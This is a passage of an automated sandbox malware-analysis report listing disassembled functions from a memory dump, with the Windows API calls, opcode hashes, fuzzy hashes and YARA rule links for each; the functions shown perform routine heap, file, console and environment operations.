                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC8F80 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 140117192-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 6374ea99e903d2f54e8a17e675fc9d7be37f4456c797b845f176888aae459462
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4841D439A08B4285EA50AB08FCA036AB3A4FF98758F900036DA8D47764EF3CE445C720
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB4F58 Relevance: 6.1, APIs: 4, Instructions: 72filetimeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: File_get_osfhandle$TimeWrite
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4019809305-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a0b24318f7913c56c20ff2674c94504e948001ce6965a94f34160d5cfbbcc17f
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CF31B622A087828BE7906B149C6433AE791FF59B64F985238DF4D43BD5CF3CD5558710
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC8470 Relevance: 6.1, APIs: 4, Instructions: 72stringCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcstol$lstrcmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3515581199-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d1a64d64ed1a9f4d72db85b557597d606b35209e80a59ae2b4deef31a258f9f3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6218532A0874283E6656B79AEB413BEFA4FF49761F855134DB4F03654CF6CE8468720
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EDE810 Relevance: 6.1, APIs: 4, Instructions: 67fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: File$DeleteErrorLastWrite_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2448200120-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 6d57269d6f2d783b0e33b3cb296fe8eadb70ae1a268e1dbc21a504202adeb425
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C6212935A18B4687E614BB11AC2427BF6A1FF94B81F894135EA0E07795CF3CE4418B20
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EE1914 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$DriveNamePathTypeVolume
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1029679093-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 98c11749b4d10f39a46d47e0adf4f6b8e1502341a23e0233d90f7bb3d593d270
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 648f10d67281140203619d4de7fafdffd58f3cadffb3b7db4f49e3fa1cc95902
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 98c11749b4d10f39a46d47e0adf4f6b8e1502341a23e0233d90f7bb3d593d270
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28313A36709B858AEB209F61DC643EAA7A4FB89B88F848175CA4D4B748DF3CD645C710
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC7CF8 Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1617791916-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: c05f5a8e4f331155ff3ab3e5f379e70f668a94b4df3bf46be910e9d743e3f00c
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C218865608B45C6EE04BB55AD2007BFBA1FF8ABE0B999130DE1E43795DF3CE4018720
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB6A48 Relevance: 6.1, APIs: 4, Instructions: 59memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3C24: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF706EC3D0C
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3C24: towupper.MSVCRT ref: 00007FF706EC3D2F
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3C24: iswalpha.MSVCRT ref: 00007FF706EC3D4F
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3C24: towupper.MSVCRT ref: 00007FF706EC3D75
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3C24: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF706EC3DBF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EDEA0F,?,?,?,00007FF706EDE925,?,?,?,?,00007FF706EBB9B1), ref: 00007FF706EB6ABF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF706EB6AD3
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EB6B84: SetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,00007FF706EB6AE8,?,?,?,00007FF706EDEA0F,?,?,?,00007FF706EDE925), ref: 00007FF706EB6B8B
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EB6B84: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,00007FF706EB6AE8,?,?,?,00007FF706EDEA0F,?,?,?,00007FF706EDE925), ref: 00007FF706EB6B97
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EB6B84: RtlFreeHeap.NTDLL ref: 00007FF706EB6BAF
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EB6B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EB6AF1,?,?,?,00007FF706EDEA0F,?,?,?,00007FF706EDE925), ref: 00007FF706EB6B39
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EB6B30: RtlFreeHeap.NTDLL ref: 00007FF706EB6B4D
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EB6B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EB6AF1,?,?,?,00007FF706EDEA0F,?,?,?,00007FF706EDE925), ref: 00007FF706EB6B59
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EDEA0F,?,?,?,00007FF706EDE925,?,?,?,?,00007FF706EBB9B1), ref: 00007FF706EB6B03
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF706EB6B17
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$Process$Free$towupper$CurrentDirectoryEnvironmentFullNamePathStringsiswalpha
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3512109576-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e00536c8ed03699ab7c530b9e14a960c38ac55562f98df499df75aaa8dc65afc
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9218162909B86C6EF04BB659C642BAFBA0FF59B44F988131CA0E47395DF3CA445C330
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EBB6B0 Relevance: 6.1, APIs: 4, Instructions: 57memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EBAF82), ref: 00007FF706EBB6D0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EBAF82), ref: 00007FF706EBB6E7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EBAF82), ref: 00007FF706EBB701
                                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EBAF82), ref: 00007FF706EBB715
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$Process$AllocSize
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2549470565-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 6b342b18174a090ff00c529f64d61edc444eda2334c6db1ef3f38bde42d80b05
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF215736A09752C6EA14EB55EC6007BF6A1FF89B84BD89671DA0E03794DF7CE441C320
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EDCFF0 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF706EC507A), ref: 00007FF706EDD01C
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF706EC507A), ref: 00007FF706EDD033
                                                                                                                                                                                                                                                                                                                                                                                                                                          • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF706EC507A), ref: 00007FF706EDD06D
                                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF706EC507A), ref: 00007FF706EDD07F
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1033415088-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 491905fd8f7d7267a23225394b58ea8fdbe6c015282cfb1fc66979edd480b55e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8A116035618B8286DA44AB20FC6417BF7A1FF8EB95F845135EA8E47B94DF3CD0458B10
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB59E4 Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC1EA0: wcschr.MSVCRT(?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF706EE0D54), ref: 00007FF706EC1EB3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF706EB5A2E
